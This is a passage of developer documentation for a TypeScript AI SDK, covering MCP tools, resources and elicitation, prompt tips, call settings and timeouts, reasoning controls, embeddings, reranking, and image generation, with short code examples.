When MCP servers return structuredContent (per the MCP specification), you can define an outputSchema to get typed tool results:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-weather': {
inputSchema: z.object({
location: z.string(),
}),
// Define outputSchema for typed results
outputSchema: z.object({
temperature: z.number(),
conditions: z.string(),
humidity: z.number(),
}),
},
},
});
const result = await tools['get-weather'].execute(
{ location: 'New York' },
{ messages: [], toolCallId: 'weather-1' },
);
console.log(`Temperature: ${result.temperature}°C`);
When outputSchema is provided:
- The client extracts structuredContent from the tool result
- The output is validated against your schema at runtime
- You get full TypeScript type safety for the result
If the server doesn't return structuredContent, the client falls back to parsing JSON from the text content. If neither is available or validation fails, an error is thrown.
Using MCP Resources
According to the MCP specification, resources are application-driven data sources that provide context to the model. Unlike tools (which are model-controlled), your application decides when to fetch and pass resources as context.
The MCP client provides three methods for working with resources:
Listing Resources
List all available resources from the MCP server:
const resources = await mcpClient.listResources();
Reading Resource Contents
Read the contents of a specific resource by its URI:
const resourceData = await mcpClient.readResource({
uri: 'file:///example/document.txt',
});
Listing Resource Templates
Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:
const templates = await mcpClient.listResourceTemplates();
Using MCP Prompts
According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.
Listing Prompts
const prompts = await mcpClient.experimental_listPrompts();
Getting a Prompt
Retrieve prompt messages, optionally passing arguments defined by the server:
const prompt = await mcpClient.experimental_getPrompt({
name: 'code_review',
arguments: { code: 'function add(a, b) { return a + b; }' },
});
Handling Elicitation Requests
Elicitation is a mechanism where MCP servers can request additional information from the client during tool execution. For example, a server might need user input to complete a registration form or confirmation for a sensitive operation.
Enabling Elicitation Support
To enable elicitation, you need to advertise the capability when creating the MCP client:
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://your-server.com/sse',
},
capabilities: {
elicitation: {},
},
});
Registering an Elicitation Handler
Use the onElicitationRequest method to register a handler that will be called when the server requests input:
import { ElicitationRequestSchema } from '@ai-sdk/mcp';
mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
// request.params.message: A message describing what input is needed
// request.params.requestedSchema: JSON schema defining the expected input structure
// Get input from the user (implement according to your application's needs)
const userInput = await getInputFromUser(
request.params.message,
request.params.requestedSchema,
);
// Return the result with one of three actions:
return {
action: 'accept', // or 'decline' or 'cancel'
content: userInput, // only required when action is 'accept'
};
});
Elicitation Response Actions
Your handler must return an object with an action field that can be one of:
- 'accept': User provided the requested information. Must include content with the data.
- 'decline': User chose not to provide the information.
- 'cancel': User cancelled the operation entirely.
Examples
You can see MCP in action in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, { title: 'Learn to handle MCP elicitation requests in Node.js', link: '/cookbook/node/mcp-elicitation', }, ]} />
title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.
Prompt Engineering
Tips
Prompts for Tools
When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.
Here are a few tips to help you get the best results:
- Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
- Keep the number of tools low, e.g. to 5 or fewer.
- Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
- Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
- Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
- When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
descriptionfield of a tool to provide information about the output of the tool execution. - You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.
In general, the goal should be to give the model all information it needs in a clear way.
Tool & Structured Data Schemas
The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.
Zod Dates
Zod expects JavaScript Date objects, but models return dates as strings.
You can specify and validate the date format using z.string().datetime() or z.string().date(),
and then use a Zod transformer to convert the string to a Date object.
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
events: z.array(
z.object({
event: z.string(),
date: z
.string()
.date()
.transform(value => new Date(value)),
}),
),
}),
}),
prompt: 'List 5 important events from the year 2000.',
});
Optional Parameters
When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.
For maximum compatibility, optional parameters should use .nullable() instead of .optional():
// This may fail with strict schema validation
const failingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().optional(), // This can cause errors
timeout: z.string().optional(),
}),
});
// This works with strict schema validation
const workingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().nullable(), // Use nullable instead
timeout: z.string().nullable(),
}),
});
Temperature Settings
For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:
const result = await generateText({
model: __MODEL__,
temperature: 0, // Recommended for tool calls
tools: {
myTool: tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
}),
}),
},
prompt: 'Execute the ls command',
});
Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:
- Generate structured data with specific formats
- Make precise tool calls with correct parameters
- Follow strict schemas consistently
Debugging
Inspecting Warnings
Not all providers support all AI SDK features. Providers either throw exceptions or return warnings when they do not support a feature. To check if your prompt, tools, and settings are handled correctly by the provider, you can check the call warnings:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.warnings);
HTTP Request Bodies
You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.
Request bodies are available via the request.body property of the response:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.request.body);
title: Settings description: Learn how to configure the AI SDK.
Settings
Large language models (LLMs) typically provide settings to augment their output.
All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:
const result = await generateText({
model: __MODEL__,
maxOutputTokens: 512,
temperature: 0.3,
maxRetries: 5,
timeout: 10000,
prompt: 'Invent a new holiday and describe its traditions.',
});
Language Model Call Options
Language model call options (LanguageModelCallOptions) are settings that influence how the language model generates its response — token limits, sampling behavior, penalties, stop sequences, seed, and reasoning. They are forwarded to the underlying model.
maxOutputTokens
Maximum number of tokens to generate.
temperature
Temperature setting.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means almost deterministic results, and higher values mean more randomness.
It is recommended to set either temperature or topP, but not both.
In AI SDK 5.0, temperature is no longer set to 0 by default.
topP
Nucleus sampling.
The value is passed through to the provider. The range depends on the provider and model. For most providers, nucleus sampling is a number between 0 and 1. E.g. 0.1 would mean that only tokens with the top 10% probability mass are considered.
It is recommended to set either temperature or topP, but not both.
topK
Only sample from the top K options for each subsequent token.
Used to remove "long tail" low probability responses.
Recommended for advanced use cases only. You usually only need to use temperature.
presencePenalty
The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
frequencyPenalty
The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
stopSequences
The stop sequences to use for stopping the text generation.
If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.
seed
The seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.
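Example: stopSequences and seed
A minimal sketch combining both settings (the specific values are illustrative):
const result = await generateText({
  model: __MODEL__,
  stopSequences: ['\n\nObservation:'], // stop when the model starts an observation block
  seed: 42, // deterministic sampling when supported by the model
  prompt: 'Invent a new holiday and describe its traditions.',
});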
reasoning
Controls how much reasoning the model performs before generating a response.
| Value | Behavior |
|---|---|
| 'provider-default' | Use the provider's default reasoning behavior (default when omitted) |
| 'none' | Disable reasoning |
| 'minimal' | Bare-minimum reasoning |
| 'low' | Fast, concise reasoning |
| 'medium' | Balanced reasoning |
| 'high' | Thorough reasoning |
| 'xhigh' | Maximum reasoning |
If you also set reasoning-related options in providerOptions (e.g. openai.reasoningEffort or anthropic.thinking), the provider-specific options take precedence and the top-level reasoning parameter is ignored.
See the reasoning guide for details on per-provider mapping and migration from providerOptions.
Request Options
Request options (RequestOptions) are settings that affect transport, retries, cancellation, and timeouts — not model generation behavior. They control how the SDK communicates with the provider's API.
maxRetries
Maximum number of retries. Set to 0 to disable retries. Default: 2.
abortSignal
An optional abort signal that can be used to cancel the call.
The abort signal can e.g. be forwarded from a user interface to cancel the call,
or to define a timeout using AbortSignal.timeout.
Example: AbortSignal.timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
abortSignal: AbortSignal.timeout(5000), // 5 seconds
});
timeout
An optional timeout in milliseconds. The call will be aborted if it takes longer than the specified duration.
This is a convenience parameter that creates an abort signal internally. It can be used alongside abortSignal - if both are provided, the call will abort when either condition is met.
You can specify the timeout either as a number (milliseconds) or as an object with the following properties:
- totalMs: The total timeout for the entire call including all steps.
- stepMs: The timeout for each individual step (LLM call). This is useful for multi-step generations where you want to limit the time spent on each step independently.
- chunkMs: The timeout between stream chunks (streaming only). The call will abort if no new chunk is received within this duration. This is useful for detecting stalled streams.
- toolMs: The default timeout for all tool executions. If a tool takes longer, it aborts and returns a tool-error so the model can respond or retry.
- tools: Per-tool timeout overrides using {toolName}Ms keys (e.g. weatherMs, slowApiMs). Takes precedence over toolMs. Tool names are type-checked for autocomplete.
Example: 5 second timeout (number format)
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: 5000, // 5 seconds
});
Example: 5 second total timeout (object format)
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { totalMs: 5000 }, // 5 seconds
});
Example: 10 second step timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { stepMs: 10000 }, // 10 seconds per step
});
Example: Combined total and step timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: {
totalMs: 60000, // 60 seconds total
stepMs: 10000, // 10 seconds per step
},
});
Example: Per-chunk timeout for streaming (streamText only)
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
timeout: { chunkMs: 5000 }, // abort if no chunk received for 5 seconds
});
Example: Tool execution timeout
const result = await generateText({
model: __MODEL__,
tools: { weather: weatherTool, slowApi: slowApiTool },
timeout: {
toolMs: 5000, // 5 seconds default for all tools
},
prompt: 'What is the weather in San Francisco?',
});
Example: Per-tool timeout overrides
const result = await generateText({
model: __MODEL__,
tools: { weather: weatherTool, slowApi: slowApiTool },
timeout: {
toolMs: 5000, // default for all tools
tools: {
weatherMs: 3000, // 3 seconds for weather tool
slowApiMs: 10000, // 10 seconds for slow API tool
},
},
prompt: 'What is the weather in San Francisco?',
});
headers
Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.
You can use the request headers to provide additional information to the provider,
depending on what the provider supports. For example, some observability providers support
headers such as Prompt-Id.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
headers: {
'Prompt-Id': 'my-prompt-id',
},
});
title: Reasoning description: Learn how to control reasoning across providers with the top-level reasoning parameter.
Reasoning
Many language models support an internal "reasoning" phase (sometimes also called "thinking") before producing a response. The AI SDK provides a top-level reasoning parameter on generateText and streamText that controls this behavior across providers with a single, portable setting.
Basic Usage
import { generateText } from 'ai';
const { text, reasoning, reasoningText } = await generateText({
model: 'anthropic/claude-sonnet-4.6',
reasoning: 'medium',
prompt: 'How many people will live in the world in 2040?',
});
The reasoning parameter accepts the following values:
| Value | Behavior |
|---|---|
| 'provider-default' | Use the provider's default reasoning behavior (default when omitted) |
| 'none' | Disable reasoning |
| 'minimal' | Bare-minimum reasoning |
| 'low' | Fast, concise reasoning |
| 'medium' | Balanced reasoning |
| 'high' | Thorough reasoning |
| 'xhigh' | Maximum reasoning |
Streaming
The reasoning parameter works the same way with streamText:
import { streamText } from 'ai';
const result = streamText({
model: 'google/gemini-3-flash-preview',
reasoning: 'high',
prompt: 'Explain the Riemann hypothesis in simple terms.',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
process.stdout.write(part.textDelta);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
Precedence Rules
The top-level reasoning parameter and provider-specific providerOptions are never merged. If you set reasoning-related options in providerOptions, they take full precedence and the top-level reasoning parameter is ignored.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('gpt-5.4'),
reasoning: 'low', // ignored because providerOptions.openai.reasoningEffort is set
providerOptions: {
openai: {
reasoningEffort: 'high', // this wins
},
},
prompt: 'Explain quantum entanglement.',
});
This design lets you use the portable reasoning parameter by default and fall back to providerOptions only when you need provider-specific features like exact token budgets.
Provider Support
The reasoning parameter is supported by the following providers: OpenAI, Anthropic, Google, xAI, Groq, DeepSeek, Fireworks, and Amazon Bedrock. Each provider translates the value to its native reasoning API. Some providers support all six levels natively, while others coerce to fewer levels (a warning is emitted when coercion occurs). Some providers use a numeric token budget instead of an enum for reasoning control; in those cases the top-level reasoning value is mapped to a budget calculated as a percentage of the model's maximum output tokens.
Providers that do not support reasoning (e.g. Mistral, Perplexity, Cohere) emit an unsupported warning and ignore the parameter.
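A quick way to see coercion or unsupported-setting warnings is to inspect result.warnings (see the section on inspecting warnings):
import { generateText } from 'ai';

const result = await generateText({
  model: __MODEL__,
  reasoning: 'high',
  prompt: 'Explain quantum entanglement.',
});

console.log(result.warnings); // coercion or unsupported-setting warnings, if any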
Migrating from providerOptions
If you currently control reasoning via providerOptions, you can migrate to the top-level reasoning parameter for portability across providers.
Before (Anthropic)
const { text } = await generateText({
model: anthropic('claude-opus-4.6'),
providerOptions: {
anthropic: {
thinking: { type: 'adaptive', effort: 'high' },
},
},
prompt: 'How many people will live in the world in 2040?',
});
After (Anthropic)
const { text } = await generateText({
model: anthropic('claude-opus-4.6'),
reasoning: 'high',
prompt: 'How many people will live in the world in 2040?',
});
Before (Anthropic with older model)
const { text } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
prompt: 'How many people will live in the world in 2040?',
});
After (Anthropic with older model)
const { text } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
reasoning: 'medium',
prompt: 'How many people will live in the world in 2040?',
});
If you need to enforce an exact token budget (e.g. exactly 12000 tokens), keep using providerOptions instead of the top-level reasoning parameter.
Before (Google with includeThoughts)
const { text } = await generateText({
model: google('gemini-3-flash-preview'),
providerOptions: {
google: {
thinkingConfig: { thinkingBudget: 4096, includeThoughts: true },
},
},
prompt: 'Explain the Riemann hypothesis in simple terms.',
});
After (Google with includeThoughts)
import { generateText } from 'ai';
import { google } from '@ai-sdk/google';
const { text } = await generateText({
model: google('gemini-3-flash-preview'),
reasoning: 'medium',
providerOptions: {
google: { thinkingConfig: { includeThoughts: true } },
},
prompt: 'Explain the Riemann hypothesis in simple terms.',
});
Before (OpenAI with reasoningSummary)
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('o3'),
providerOptions: {
openai: { reasoningEffort: 'high', reasoningSummary: 'auto' },
},
prompt: 'Explain quantum entanglement.',
});
After (OpenAI with reasoningSummary)
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('o3'),
reasoning: 'high',
providerOptions: {
openai: { reasoningSummary: 'auto' },
},
prompt: 'Explain quantum entanglement.',
});
Note that providerOptions can still be used alongside reasoning for provider-specific features unrelated to reasoning effort. However, if providerOptions includes reasoning effort/budget settings (e.g. reasoningEffort, thinking, thinkingConfig.thinkingBudget), those take full precedence and the top-level reasoning parameter is ignored.
title: Embeddings description: Learn how to embed values with the AI SDK.
Embeddings
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
Embedding a Single Value
The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words or phrases, or clustering text.
You can use it with embedding models, e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').
import { embed } from 'ai';
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embedding models,
e.g. openai.embeddingModel('text-embedding-3-large') or mistral.embeddingModel('mistral-embed').
import { embedMany } from 'ai';
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Embedding Similarity
After embedding values, you can calculate the similarity between them using the cosineSimilarity function.
This is useful to e.g. find similar words or phrases in a dataset.
You can also rank and filter related items based on their similarity, as shown in the ranking sketch below.
import { cosineSimilarity, embedMany } from 'ai';
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
console.log(
`cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);
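As noted above, you can also rank a whole set of documents by their similarity to a query embedding. A minimal sketch (the query and documents are illustrative):
import { cosineSimilarity, embed, embedMany } from 'ai';
const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];
const { embedding: queryEmbedding } = await embed({
  model: 'openai/text-embedding-3-small',
  value: 'stormy weather',
});
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: documents,
});
// sort documents by descending similarity to the query
const ranked = documents
  .map((document, index) => ({
    document,
    similarity: cosineSimilarity(queryEmbedding, embeddings[index]),
  }))
  .sort((a, b) => b.similarity - a.similarity);
console.log(ranked);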
Token Usage
Many providers charge based on the number of tokens used to generate embeddings.
Both embed and embedMany provide token usage information in the usage property of the result object:
import { embed } from 'ai';
const { embedding, usage } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(usage); // { tokens: 10 }
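The same applies to embedMany, where usage is aggregated across all embedded values (the token count below is illustrative):
import { embedMany } from 'ai';
const { embeddings, usage } = await embedMany({
  model: 'openai/text-embedding-3-small',
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
console.log(usage); // e.g. { tokens: 20 }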
Settings
Provider Options
Embedding model settings can be configured using providerOptions for provider-specific parameters:
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // Reduce embedding dimensions
},
},
});
Parallel Requests
The embedMany function supports parallel processing with a configurable maxParallelCalls setting to optimize performance:
import { embedMany } from 'ai';
const { embeddings, usage } = await embedMany({
maxParallelCalls: 2, // Limit parallel requests
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Retries
Both embed and embedMany accept an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the embedding process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
Both embed and embedMany accept an optional abortSignal parameter of
type AbortSignal
that you can use to abort the embedding process or set a timeout.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
Both embed and embedMany accept an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the embedding request.
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
headers: { 'X-Custom-Header': 'custom-value' },
});
Response Information
Both embed and embedMany return response information that includes the raw provider response:
import { embed } from 'ai';
const { embedding, response } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(response); // Raw provider response
Embedding Middleware
You can enhance embedding models, e.g. to set default values, using
wrapEmbeddingModel and EmbeddingModelMiddleware.
Here is an example that uses the built-in defaultEmbeddingSettingsMiddleware:
import {
defaultEmbeddingSettingsMiddleware,
embed,
wrapEmbeddingModel,
gateway,
} from 'ai';
const embeddingModelWithDefaults = wrapEmbeddingModel({
model: gateway.embeddingModel('google/gemini-embedding-001'),
middleware: defaultEmbeddingSettingsMiddleware({
settings: {
providerOptions: {
google: {
outputDimensionality: 256,
taskType: 'CLASSIFICATION',
},
},
},
}),
});
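The wrapped model can then be used like any other embedding model:
import { embed } from 'ai';
const { embedding } = await embed({
  model: embeddingModelWithDefaults,
  value: 'sunny day at the beach',
});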
Embedding Providers & Models
Several providers offer embedding models:
| Provider | Model | Embedding Dimensions | Multimodal |
|---|---|---|---|
| OpenAI | text-embedding-3-large | 3072 | |
| OpenAI | text-embedding-3-small | 1536 | |
| OpenAI | text-embedding-ada-002 | 1536 | |
| Google Generative AI | gemini-embedding-001 | 3072 | |
| Google Generative AI | gemini-embedding-2-preview | 3072 | |
| Mistral | mistral-embed | 1024 | |
| Cohere | embed-english-v3.0 | 1024 | |
| Cohere | embed-multilingual-v3.0 | 1024 | |
| Cohere | embed-english-light-v3.0 | 384 | |
| Cohere | embed-multilingual-light-v3.0 | 384 | |
| Cohere | embed-english-v2.0 | 4096 | |
| Cohere | embed-english-light-v2.0 | 1024 | |
| Cohere | embed-multilingual-v2.0 | 768 | |
| Amazon Bedrock | amazon.titan-embed-text-v1 | 1536 | |
| Amazon Bedrock | amazon.titan-embed-text-v2:0 | 1024 | |
title: Reranking description: Learn how to rerank documents with the AI SDK.
Reranking
Reranking is a technique used to improve search relevance by reordering a set of documents based on their relevance to a query. Unlike embedding-based similarity search, reranking models are specifically trained to understand the relationship between queries and documents, often producing more accurate relevance scores.
Reranking Documents
The AI SDK provides the rerank function to rerank documents based on their relevance to a query.
You can use it with reranking models, e.g. cohere.reranking('rerank-v3.5') or bedrock.reranking('cohere.rerank-v3-5:0').
import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'talk about rain',
topN: 2, // Return top 2 most relevant documents
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Working with Object Documents
Reranking also supports structured documents (JSON objects), making it ideal for searching through databases, emails, or other structured content:
import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';
const documents = [
{
from: 'Paul Doe',
subject: 'Follow-up',
text: 'We are happy to give you a discount of 20% on your next order.',
},
{
from: 'John McGill',
subject: 'Missing Info',
text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
},
];
const { ranking, rerankedDocuments } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents,
query: 'Which pricing did we get from Oracle?',
topN: 1,
});
console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }
Understanding the Results
The rerank function returns a comprehensive result object:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking, rerankedDocuments, originalDocuments } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
});
// ranking: sorted array of { originalIndex, score, document }
// rerankedDocuments: documents sorted by relevance (convenience property)
// originalDocuments: original documents array
Each item in the ranking array contains:
- originalIndex: Position in the original documents array
- score: Relevance score (typically 0-1, where higher is more relevant)
- document: The original document
Settings
Top-N Results
Use topN to limit the number of results returned. This is useful for retrieving only the most relevant documents:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['doc1', 'doc2', 'doc3', 'doc4', 'doc5'],
query: 'relevant information',
topN: 3, // Return only top 3 most relevant documents
});
Provider Options
Reranking model settings can be configured using providerOptions for provider-specific parameters:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
cohere: {
maxTokensPerDoc: 1000, // Limit tokens per document
},
},
});
Retries
The rerank function accepts an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the reranking process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
The rerank function accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the reranking process or set a timeout.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});
Custom Headers
The rerank function accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the reranking request.
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
headers: { 'X-Custom-Header': 'custom-value' },
});
Response Information
The rerank function returns response information that includes the raw provider response:
import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';
const { ranking, response } = await rerank({
model: cohere.reranking('rerank-v3.5'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
});
console.log(response); // { id, timestamp, modelId, headers, body }
Reranking Providers & Models
Several providers offer reranking models:
| Provider | Model |
|---|---|
| Cohere | rerank-v3.5 |
| Cohere | rerank-english-v3.0 |
| Cohere | rerank-multilingual-v3.0 |
| Amazon Bedrock | amazon.rerank-v1:0 |
| Amazon Bedrock | cohere.rerank-v3-5:0 |
| Together.ai | Salesforce/Llama-Rank-v1 |
| Together.ai | mixedbread-ai/Mxbai-Rerank-Large-V2 |
title: Image Generation description: Learn how to generate images with the AI SDK.
Image Generation
The AI SDK provides the generateImage
function to generate images based on a given prompt using an image model.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
});
You can access the image data using the base64 or uint8Array properties:
const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data
Settings
Size and Aspect Ratio
Depending on the model, you can either specify the size or the aspect ratio.
Size
The size is specified as a string in the format {width}x{height}.
Models only support a few sizes, and the supported sizes are different for each model and provider.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
});
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
aspectRatio: '16:9',
});
Generating Multiple Images
generateImage also supports generating multiple images at once:
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { images } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
n: 4, // number of images to generate
});
Each image model has an internal limit on how many images it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple images using the n parameter. By default, the SDK uses provider-documented limits (for example, DALL-E 3 can only generate 1 image per call, while DALL-E 2 supports up to 10).
If needed, you can override this behavior using the maxImagesPerCall setting when generating your image. This is particularly useful when working with new or custom models where the default batch size might not be optimal:
const { images } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
maxImagesPerCall: 5, // Override the default batch size
n: 10, // Will make 2 calls of 5 images each
});
Providing a Seed
You can provide a seed to the generateImage function to control the output of the image generation process.
If supported by the model, the same seed will always produce the same image.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
seed: 1234567890,
});
Provider-specific Settings
Image models often have provider- or even model-specific settings.
You can pass such settings to the generateImage function
using the providerOptions parameter. The options for the provider
(openai in the example below) become request body properties.
import { generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
providerOptions: {
openai: { style: 'vivid', quality: 'hd' },
},
});
Abort Signals and Timeouts
generateImage accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the image generation process or set a timeout.
import { generateImage } from 'ai';
__PROVIDER_IMPORT__;
const { image } = await generateImage({
model: __IMAGE_MODEL__,
prompt: 'Santa Claus driving a Cadillac',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
